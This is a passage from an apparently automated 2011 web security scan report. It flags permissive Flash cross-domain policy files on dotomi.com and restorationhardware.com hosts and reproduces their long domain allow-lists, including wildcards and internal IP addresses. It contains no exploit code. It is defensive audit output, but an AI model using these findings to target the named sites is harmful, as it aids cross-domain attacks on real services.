<allow-access-from domain="beta.graco.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.ashleyfurniture.com" />
<allow-access-from domain="*.ashleyfurniturehomestore.com" />
<allow-access-from domain="s7sps1-staging.scene7.com" />
<allow-access-from domain="s7sps1.scene7.com" />
<allow-access-from domain="*.lokion.com"/>
<allow-access-from domain="*.vikingrange.com"/>
<allow-access-from domain="www.armstrong.com"/>
<allow-access-from domain="*.classscene.com"/>
<allow-access-from domain="*.classsceneqa.com"/>
<allow-access-from domain="*.classscenedemo.com"/>
<allow-access-from domain="*.fulltiltboots.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.karhuskico.com"/>
<allow-access-from domain="*.k2women.com"/>
<allow-access-from domain="*.k2snowboarding.com"/>
<allow-access-from domain="*.k2skis.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.lineskis.com"/>
<allow-access-from domain="*.5150snowboarding.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.atlassnowshoe.com"/>
<allow-access-from domain="*.tubbssnowshoes.com"/>
<allow-access-from domain="*.k2telemark.com"/>
<allow-access-from domain="*.k2dealertools.com"/>
<allow-access-from domain="*.planet-earth-clothing.com"/>
<allow-access-from domain="*.k2skates.com"/>
<allow-access-from domain="*.k2iceskates.com"/>
<allow-access-from domain="*.snowshoes.com"/>
<allow-access-from domain="*.vashonstorefront.com"/>
<allow-access-from domain="*.adiofootwear.com"/>
<allow-access-from domain="*.adio.com"/>
<allow-access-from domain="4.59.112.138"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.store.americangirl.com"/>
<allow-access-from domain="agpmt-prod:7778"/>
<allow-access-from domain="agpmt-test:7777"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="*.jcpenney.com"/>
<allow-access-from domain="*.teamzonesports.com"/>
<allow-access-from domain="*.underarmour.com"/>
<allow-access-from domain="broadridge.mominc.com"/>
<allow-access-from domain="*.craftsman.com"/>
<allow-access-from domain="*.sothebys.com"/>
<allow-access-from domain="*.facebook.com"/>
<allow-access-from domain="*.thuzi.com"/>
<allow-access-from domain="*.samsclub.com"/>
<allow-access-from domain="161.169.79.10"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.hansondodge.com"/>
<allow-access-from domain="*.thebrick.com"/>
<allow-access-from domain="s7demo.scene7.com"/>
<allow-access-from domain="*.richrelevance.com"/>
<allow-access-from domain="*.hit.homedepot.resource.com"/>
<allow-access-from domain="*.allurent.net"/>
<allow-access-from domain="*.ashro.com"/>
<allow-access-from domain="*.countrydoor.com"/>
<allow-access-from domain="*.ginnys.com"/>
<allow-access-from domain="*.grandpointe.com"/>
<allow-access-from domain="*.monroeandmain.com"/>
<allow-access-from domain="*.midnightvelvet.com"/>
<allow-access-from domain="*.raceteamgear.com"/>
<allow-access-from domain="*.swisscolony.com"/>
<allow-access-from domain="*.seventhavenue.com"/>
<allow-access-from domain="*.homevisions.com"/>
<allow-access-from domain="*.wards.com"/>
<allow-access-from domain="*.tenderfilet.com"/>
<allow-access-from domain="assets.k2sports.com"/>
<allow-access-from domain="assets.ridesnowboards.com"/>
<allow-access-from domain="assets1.k2sports.com"/>
<allow-access-from domain="assets1.ridesnowboards.com"/>
<allow-access-from domain="assets2.k2sports.com"/>
<allow-access-from domain="assets2.ridesnowboards.com"/>
<allow-access-from domain="161.211.2.28"/>
<allow-access-from domain="161.211.155.7"/>
<allow-access-from domain="ah-stg.fry.com"/>
<allow-access-from domain="cd-stg.fry.com"/>
<allow-access-from domain="gn-stg.fry.com"/>
<allow-access-from domain="gp-stg.fry.com"/>
<allow-access-from domain="hv-stg.fry.com"/>
<allow-access-from domain="mm-stg.fry.com"/>
<allow-access-from domain="mv-stg.fry.com"/>
<allow-access-from domain="mw-stg.fry.com"/>
<allow-access-from domain="rt-stg.fry.com"/>
<allow-access-from domain="rc-stg.fry.com"/>
<allow-access-from domain="tf-stg.fry.com"/>
<allow-access-from domain="sc-stg.fry.com"/>
<allow-access-from domain="sa-stg.fry.com"/>
<allow-access-from domain="shopdeluxe-v9-dev.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="shopdeluxe-v9-uat.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="stage.coach.com"/>
<allow-access-from domain="*.coach.com"/>
<allow-access-from domain="demandware.edgesuite.net"/>
<allow-access-from domain="*.buildabear.com"/>
<allow-access-from domain="*.babwtest.com"/>
<allow-access-from domain="customshop.mesfire.com"/>
<allow-access-from domain="stage.homeinspiration.homedepot.com "/>
<allow-access-from domain="homeinspiration.homedepot.com"/>
<allow-access-from domain="pointroll.com"/>
<allow-access-from domain="*.pointroll.com"/>
<allow-access-from domain="*.smartwool.com"/>
<allow-access-from domain="*.summitprojects.com"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="511.niteviewtech.com"/>
<allow-access-from domain="www.lauramercier.com"/>
<allow-access-from domain="*.lumberliquidators.com"/>
<allow-access-from domain="*.ae.com"/>
<allow-access-from domain="*.aezone.com"/>
<allow-access-from domain="s7everest.macromedia.com"/>
<allow-access-from domain="s7fuji.macromedia.com"/>
<allow-access-from domain="s7qa-is.macromedia.com"/>
<allow-access-from domain="officemax.companychecksandforms.com"/>
<allow-access-from domain="www.511deasbf.com"/>
<allow-access-from domain="*.511deasbf.com"/>
<allow-access-from domain="*.vcfcorp.com"/>
...[SNIP]...
<allow-access-from domain="*.asfurniture.com"/>
<allow-access-from domain="*.vcf.com"/>
...[SNIP]...
<allow-access-from domain="anthropologie.uat.venda.com"/>
<allow-access-from domain="anthropologie.live.venda.com"/>
<allow-access-from domain="*.511academy.com"/>
<allow-access-from domain="*.reedkrakoff.com"/>
<allow-access-from domain="stage.wearport.com"/>
<allow-access-from domain="*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.anthropologie.eu"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="www.leadbased.com"/>
<allow-access-from domain="*.mxbi.com"/>
<allow-access-from domain="*.jordans.com"/>
<allow-access-from domain="jordans.com"/>
<allow-access-from domain="jordansqa.weymouthdesign.com"/>
<allow-access-from domain="*.mercury.com"/>
<allow-access-from domain="*.cb2.com"/>
<allow-access-from domain="*.landofnod.com"/>
<allow-access-from domain="*.crateandbarrel.com"/>
<allow-access-from domain="*.crateandbarrel.ca"/>
<allow-access-from domain="cim-dev.deluxe.com"/>
<allow-access-from domain="cim-qa.deluxe.com"/>
<allow-access-from domain="www.deluxe-check-order.com"/>
<allow-access-from domain="wwwpreprod.deluxe-check-order.com"/>
<allow-access-from domain="*.vfimagewear.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.zumiez.com"/>
<allow-access-from domain="zumiez.com"/>
<allow-access-from domain="*.vfc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="service-apps.scene7.com"/>
<allow-access-from domain="service-apps-staging.scene7.com"/>
<allow-access-from domain="walmart.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps-staging.scene7.com"/>
<allow-access-from domain="63.241.188.118"/>
<allow-access-from domain="63.241.188.119"/>
<allow-access-from domain="63.241.188.116"/>
<allow-access-from domain="63.241.188.120"/>
<allow-access-from domain="63.241.188.121"/>
<allow-access-from domain="63.241.188.117"/>
<allow-access-from domain="63.241.188.122"/>
<allow-access-from domain="63.241.188.123"/>
<allow-access-from domain="63.241.188.124"/>
<allow-access-from domain="63.241.188.125"/>
<allow-access-from domain="stage.store.americangirl.com"/>
<allow-access-from domain="*.kohls.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="media.kohls.com.edgesuite.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.edgeboss.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscorporation.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscareers.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlsoncampus.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.apiservice.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="98.129.79.154" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="httpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="rtmpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mixercast.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fluid.com"/>
<allow-access-from domain="*.enlighten.com"/>
<allow-access-from domain="*.hunterdouglas.com"/>
<allow-access-from domain=".allurent.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="64.52.70.13"/>
<allow-access-from domain="64.52.70.30"/>
<allow-access-from domain="64.52.70.33"/>
<allow-access-from domain="64.52.70.60"/>
<allow-access-from domain="76.12.61.174"/>
<allow-access-from domain="*.kmart.com"/>
<allow-access-from domain="skavamp.com"/>
<allow-access-from domain="*.skavamp.com"/>
<allow-access-from domain="*.cloudfront.net"/>
<allow-access-from domain="www.grandinroad.com"/>
<allow-access-from domain="www.frontgate.com"/>
<allow-access-from domain="97.65.222.116"/>
<allow-access-from domain="97.65.222.115"/>
<allow-access-from domain="*.neptune.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="*.web.rga.com"/>
<allow-access-from domain="*.ny.rga.com"/>
<allow-access-from domain="content01.nimblefish.com"/>
<allow-access-from domain="cdn.nimblefish.com"/>
<allow-access-from domain="media.nimblefish.com"/>
<allow-access-from domain="nv.nimblefish.com"/>
<allow-access-from domain="app.nimblefish.com"/>
<allow-access-from domain="media.beta01.nimblefish.com"/>
<allow-access-from domain="nv.beta01.nimblefish.com"/>
<allow-access-from domain="app.beta01.nimblefish.com"/>
<allow-access-from domain="media.content01.nimblefish.com"/>
<allow-access-from domain="nv.content01.nimblefish.com"/>
<allow-access-from domain="app.content01.nimblefish.com"/>
<allow-access-from domain="*.511fbileeda.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.hottopic.com"/>
<allow-access-from domain="*.teamworkathletic.com "/>
<allow-access-from domain="*.scene7.com"/>
<allow-access-from domain="*.shopvcf.com"/>
<allow-access-from domain="shopvcf.com"/>
<allow-access-from domain="*.axelscript.com"/>
<allow-access-from domain="*.sherwin.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sherwin-williams.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.resource.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="*.modea.com"/>
<allow-access-from domain="*.mizunousa.com"/>
<allow-access-from domain="*.mizunorunning.com"/>
<allow-access-from domain="*.mizunocda.com"/>
<allow-access-from domain="*.footjoy.com"/>
<allow-access-from domain="*.footjoy.co.uk"/>
<allow-access-from domain="*.footjoy.com.fr"/>
<allow-access-from domain="*.footjoy.de"/>
<allow-access-from domain="*.footjoy.se"/>
<allow-access-from domain="*.footjoy.ca"/>
<allow-access-from domain="*.footjoy.com.au"/>
<allow-access-from domain="*.footjoy.jp"/>
<allow-access-from domain="*.footjoy.co.th"/>
<allow-access-from domain="*.footjoy.com.my"/>
<allow-access-from domain="*.footjoy.com.sg"/>
<allow-access-from domain="*.footjoy.co.kr"/>
<allow-access-from domain="*.footjoy.com.cn"/>
<allow-access-from domain="pitchinteractive.com"/>
<allow-access-from domain="*.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="flashmaxx.com" secure="true" />
...[SNIP]...
<allow-access-from domain="searsfb.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ec2-184-72-166-175.compute-1.amazonaws.com"/>
<allow-access-from domain="*.getpapered.com"/>
<allow-access-from domain="*.englishpapercompany.com"/>
<allow-access-from domain="*.koolsquare.net"/>
<allow-access-from domain="*.target.com"/>
<allow-access-from domain="*.home.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cos.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.lvld.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="cp.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.at" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.be" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ch" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.hu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.il" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.kr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.nz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.th" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ar" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.br" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.cn" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.co" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.hk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.mx" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.my" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pe" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ph" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.sg" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tw" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ve" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.de" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.dk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ee" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.es" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.gr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ie" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.it" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.lu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.nl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.no" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.pt" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.se" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.brooksbrothers.com"/>
<allow-access-from domain="*.whitneyenglish.com"/>
<allow-access-from domain="canadiantire.ca"/>
<allow-access-from domain="*.maxnow.com"/>
<allow-access-from domain="4.59.112.158"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="*.converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cust.aops-eds.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="kobe.nike.jess3.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.highschoolsports.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skysports.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lequipe.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovation.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovationdev.digitas.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nikedev.framfab.dk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akqa.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ostkcdn.com"/>
<allow-access-from domain="*.aggregateknowledge.com"/>
<allow-access-from domain="*.nikedev.com"/>
<allow-access-from domain="anthrode.uat.venda.com"/>
<allow-access-from domain="anthropologie.custqa.venda.com"/>
<allow-access-from domain="*.fingerhut.com"/>
<allow-access-from domain="*.gettington.com"/>
...[SNIP]...

6.63. http://login.dotomi.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:04 GMT
Server: Apache
X-Name: dmc-o01
Set-Cookie: Apache=173.193.214.243.1305510844202398; path=/
Last-Modified: Tue, 23 Nov 2010 00:49:00 GMT
ETag: "3500060-a1-495adbd05d700"
Accept-Ranges: bytes
Content-Length: 161
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://*.dotomi.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.dotomi.com" />
</cross-domain-policy>

6.64. http://media.restorationhardware.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.restorationhardware.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.restorationhardware.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Expires: Mon, 16 May 2011 11:53:22 GMT
Accept-Ranges: bytes
ETag: W/"25343-1305036218000"
Last-Modified: Tue, 10 May 2011 14:03:38 GMT
Content-Type: application/xml
Content-Length: 25343
Date: Mon, 16 May 2011 01:53:22 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.laneventure.com"/>
<allow-access-from domain="*.pearsonco.com"/>
<allow-access-from domain="*.targetimg1.com"/>
<allow-access-from domain="*.targetimg2.com"/>
<allow-access-from domain="*.targetimg3.com"/>
<allow-access-from domain="*.agilent.com"/>
<allow-access-from domain="*.artvan.com"/>
<allow-access-from domain="*.mizunogolf.com"/>
<allow-access-from domain="*.talbots.com"/>
<allow-access-from domain="giftadvisor.indelible.tv"/>
<allow-access-from domain="*.taaz.com"/>
<allow-access-from domain="www.flashmaxx.com"/>
<allow-access-from domain="flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.armstrong.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="sassomedia.com"/>
<allow-access-from domain="*.photoshop.com"/>
<allow-access-from domain="kijones.host.adobe.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="*.trex.com"/>
<allow-access-from domain="*.trexco.com"/>
<allow-access-from domain="*.vermontcountrystore.com"/>
<allow-access-from domain="*.pabng.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.k2admin.com"/>
<allow-access-from domain="*.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.shopdeluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.nimblefish.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fossil.com"/>
<allow-access-from domain="www.michele.com"/>
<allow-access-from domain="127.0.0.1" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.polarisindustries.com"/>
<allow-access-from domain="backstage.polarisindustries.com"/>
<allow-access-from domain="s7diod-isorigin.scene7.com"/>
<allow-access-from domain="origin-na1.scene7.com"/>
<allow-access-from domain="origin-na2.scene7.com"/>
<allow-access-from domain="origin-na3.scene7.com"/>
<allow-access-from domain="origin-na4.scene7.com"/>
<allow-access-from domain="origin-na5.scene7.com"/>
<allow-access-from domain="origin-na6.scene7.com"/>
<allow-access-from domain="origin-na7.scene7.com"/>
<allow-access-from domain="origin-na8.scene7.com"/>
<allow-access-from domain="s7d1.scene7.com"/>
<allow-access-from domain="s7d2.scene7.com"/>
<allow-access-from domain="s7d3.scene7.com"/>
<allow-access-from domain="s7d4.scene7.com"/>
<allow-access-from domain="s7ondemand1.scene7.com"/>
<allow-access-from domain="irtex1.scene7.com"/>
<allow-access-from domain="10.80.1.144"/>
<allow-access-from domain="10.80.1.152"/>
<allow-access-from domain="10.80.1.42"/>
<allow-access-from domain="origin-apps.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps.scene7.com"/>
<allow-access-from domain="isstaging.scene7.com"/>
<allow-access-from domain="techservices.scene7.com"/>
<allow-access-from domain="ecomtest1.hancockms.com"/>
<allow-access-from domain="www.hancockfabrics.com"/>
<allow-access-from domain="www.eddiebauer.com"/>
<allow-access-from domain="dev.eddiebauer.com"/>
<allow-access-from domain="qa.eddiebauer.com"/>
<allow-access-from domain="testvipd1.scene7.com"/>
<allow-access-from domain="testvipd2.scene7.com"/>
<allow-access-from domain="testvipd3.scene7.com"/>
<allow-access-from domain="testvipd4.scene7.com"/>
<allow-access-from domain="s7ondemand3.scene7.com"/>
<allow-access-from domain="s7ondemand7.scene7.com"/>
<allow-access-from domain="s7ips1.scene7.com"/>
<allow-access-from domain="s7ondemand5.scene7.com"/>
<allow-access-from domain="*.sample.scene7.com"/>
<allow-access-from domain="origin-search.scene7.com"/>
<allow-access-from domain="staging.scene7.com"/>
<allow-access-from domain="s7testis.adobe.com"/>
<allow-access-from domain="sportstown.crosscomm.net"/>
<allow-access-from domain="sportstown.com"/>
<allow-access-from domain="*.sportstown.com"/>
<allow-access-from domain="www.anthropologie.com"/>
<allow-access-from domain="staging.anthropologie.us"/>
<allow-access-from domain="smartwool.dev.summitprojects.com"/>
<allow-access-from domain="smartwool.stage.summitprojects.com"/>
<allow-access-from domain="www.smartwool.com"/>
<allow-access-from domain="s7d5.scene7.com"/>
<allow-access-from domain="testvipd5.scene7.com"/>
<allow-access-from domain="www.roadrunnersports.com"/>
<allow-access-from domain="dev.atgnow.com"/>
<allow-access-from domain="staging.roadrunnersports.com"/>
<allow-access-from domain="*.sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain=" s7.sears.com "/>
<allow-access-from domain="*.myctmh.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.instrum3nt.com"/>
<allow-access-from domain="*.tommybahama.com"/>
<allow-access-from domain="demo.ml.nurun.com"/>
<allow-access-from domain="trek07.hansondodge.com"/>
<allow-access-from domain="*.dexdealer.com" />
<allow-access-from domain="*.bontrager.com" />
<allow-access-from domain="*.trekbikes.com" />
<allow-access-from domain="*.readyfortheroadahead.com" />
<allow-access-from domain="*.belk.com"/>
<allow-access-from domain="*.sears.com"/>
<allow-access-from domain="*.dayport.com"/>
<allow-access-from domain="eaqa2prod1234.ethanallen.com"/>
<allow-access-from domain="devaws.ethanallen.com"/>
<allow-access-from domain="elm.kharv.com"/>
<allow-access-from domain="serotoninsoftware.com"/>
<allow-access-from domain="*.ethanallen.com"/>
<allow-access-from domain="*.wishbook.com"/>
<allow-access-from domain="*.entriq.net"/>
<allow-access-from domain="test-web1-www.lbiatlanta.com"/>
<allow-access-from domain="*.newellco.com"/>
<allow-access-from domain="preview.graco.com"/>
<allow-access-from domain="*.gracobaby.com"/>
<allow-access-from domain="s.sears.com"/>
<allow-access-from domain="202.44.56.2"/>
<allow-access-from domain="202.44.58.2"/>
<allow-access-from domain="beta.graco.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.ashleyfurniture.com" />
<allow-access-from domain="*.ashleyfurniturehomestore.com" />
<allow-access-from domain="s7sps1-staging.scene7.com" />
<allow-access-from domain="s7sps1.scene7.com" />
<allow-access-from domain="*.lokion.com"/>
<allow-access-from domain="*.vikingrange.com"/>
<allow-access-from domain="www.armstrong.com"/>
<allow-access-from domain="*.classscene.com"/>
<allow-access-from domain="*.classsceneqa.com"/>
<allow-access-from domain="*.classscenedemo.com"/>
<allow-access-from domain="*.fulltiltboots.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.karhuskico.com"/>
<allow-access-from domain="*.k2women.com"/>
<allow-access-from domain="*.k2snowboarding.com"/>
<allow-access-from domain="*.k2skis.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.lineskis.com"/>
<allow-access-from domain="*.5150snowboarding.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.atlassnowshoe.com"/>
<allow-access-from domain="*.tubbssnowshoes.com"/>
<allow-access-from domain="*.k2telemark.com"/>
<allow-access-from domain="*.k2dealertools.com"/>
<allow-access-from domain="*.planet-earth-clothing.com"/>
<allow-access-from domain="*.k2skates.com"/>
<allow-access-from domain="*.k2iceskates.com"/>
<allow-access-from domain="*.snowshoes.com"/>
<allow-access-from domain="*.vashonstorefront.com"/>
<allow-access-from domain="*.adiofootwear.com"/>
<allow-access-from domain="*.adio.com"/>
<allow-access-from domain="4.59.112.138"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.store.americangirl.com"/>
<allow-access-from domain="agpmt-prod:7778"/>
<allow-access-from domain="agpmt-test:7777"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="*.jcpenney.com"/>
<allow-access-from domain="*.teamzonesports.com"/>
<allow-access-from domain="*.underarmour.com"/>
<allow-access-from domain="broadridge.mominc.com"/>
<allow-access-from domain="*.craftsman.com"/>
<allow-access-from domain="*.sothebys.com"/>
<allow-access-from domain="*.facebook.com"/>
<allow-access-from domain="*.thuzi.com"/>
<allow-access-from domain="*.samsclub.com"/>
<allow-access-from domain="161.169.79.10"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.hansondodge.com"/>
<allow-access-from domain="*.thebrick.com"/>
<allow-access-from domain="s7demo.scene7.com"/>
<allow-access-from domain="*.richrelevance.com"/>
<allow-access-from domain="*.hit.homedepot.resource.com"/>
<allow-access-from domain="*.allurent.net"/>
<allow-access-from domain="*.ashro.com"/>
<allow-access-from domain="*.countrydoor.com"/>
<allow-access-from domain="*.ginnys.com"/>
<allow-access-from domain="*.grandpointe.com"/>
<allow-access-from domain="*.monroeandmain.com"/>
<allow-access-from domain="*.midnightvelvet.com"/>
<allow-access-from domain="*.raceteamgear.com"/>
<allow-access-from domain="*.swisscolony.com"/>
<allow-access-from domain="*.seventhavenue.com"/>
<allow-access-from domain="*.homevisions.com"/>
<allow-access-from domain="*.wards.com"/>
<allow-access-from domain="*.tenderfilet.com"/>
<allow-access-from domain="assets.k2sports.com"/>
<allow-access-from domain="assets.ridesnowboards.com"/>
<allow-access-from domain="assets1.k2sports.com"/>
<allow-access-from domain="assets1.ridesnowboards.com"/>
<allow-access-from domain="assets2.k2sports.com"/>
<allow-access-from domain="assets2.ridesnowboards.com"/>
<allow-access-from domain="161.211.2.28"/>
<allow-access-from domain="161.211.155.7"/>
<allow-access-from domain="ah-stg.fry.com"/>
<allow-access-from domain="cd-stg.fry.com"/>
<allow-access-from domain="gn-stg.fry.com"/>
